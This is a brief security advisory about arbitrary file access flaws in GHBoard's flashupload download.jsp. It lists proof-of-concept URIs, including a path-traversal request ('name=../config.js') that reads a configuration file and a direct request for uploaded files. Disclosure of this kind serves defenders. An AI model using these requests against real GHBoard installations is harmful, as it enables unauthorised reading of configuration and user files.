GHBoard Multiple Arbitrary File Access Vulnerabilities

GHBoard Multiple Arbitrary File Access Vulnerabilities

The following proof-of-concept URIs are available:

http://www.example.com/ghboard/component/flashupload/download.jsp?name=[file_name]

http://www.example.com/ghboard/component/flashupload/download.jsp?name=../config.js

http://www.example.com/ghboard/component/flashupload/data/upload_filename.xxx